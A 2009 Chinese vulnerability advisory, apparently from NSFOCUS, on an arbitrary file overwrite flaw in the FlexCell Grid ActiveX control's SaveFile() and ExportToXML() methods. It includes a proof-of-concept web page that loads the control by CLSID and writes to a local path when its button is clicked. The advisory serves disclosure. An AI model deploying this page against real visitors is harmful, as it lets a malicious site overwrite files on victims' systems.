安全研究

安全漏洞
FlexCell Grid ActiveX控件SaveFile()和ExportToXML()方法任意文件覆盖漏洞

发布日期:2009-01-27
更新日期:2009-01-28

受影响系统:
FlexCell Technologies FlexCell Grid ActiveX 5.x
描述:
FlexCell Grid ActiveX控件是一款表格控制工具,提供拷贝、拷贝预览、图表、合并单元格等全面功能。

FlexCell Grid ActiveX控件没有正确地验证对SaveFile()和ExportToXML()方法的输入参数,如果远程攻击者受骗访问了恶意网站并向该方式传送了特制参数的话,就可能导致以当前登录用户的权限覆盖任意系统文件。

<**>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<HTML>
<BODY>

<b>  
    Author : Houssamix    <br/>  <br/>  <br/>

    FlexCell Grid Control 5.6.9 Remote File Overwrite Exploit  <br/>
    
    ExportToXML() is vuln to <br/>

<b/>


<object id=hsmx classid="clsid:{2A7D9CCE-211A-4654-9449-718F71ED9644}"></object>

<SCRIPT>
/*
Report for Clsid: {2A7D9CCE-211A-4654-9449-718F71ED9644}
RegKey Safe for Script: Faux
RegKey Safe for Init: Faux
Implements IObjectSafety: Vrai
IDisp Safe:  Safe for untrusted: caller,data  
IPersist Safe:  Safe for untrusted: caller,data  
IPStorage Safe:  Safe for untrusted: caller,data  
*/
function hehe()
{
     File = "c:\\hsmx.txt"
   hsmx.SaveFile(File)
}

</SCRIPT>
<input language=JavaScript onclick=hehe() type=button value="execute exploit"><br>
</body>
</HTML>

建议:
厂商补丁:

FlexCell Technologies
---------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.grid2000.com/

浏览次数:3134
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障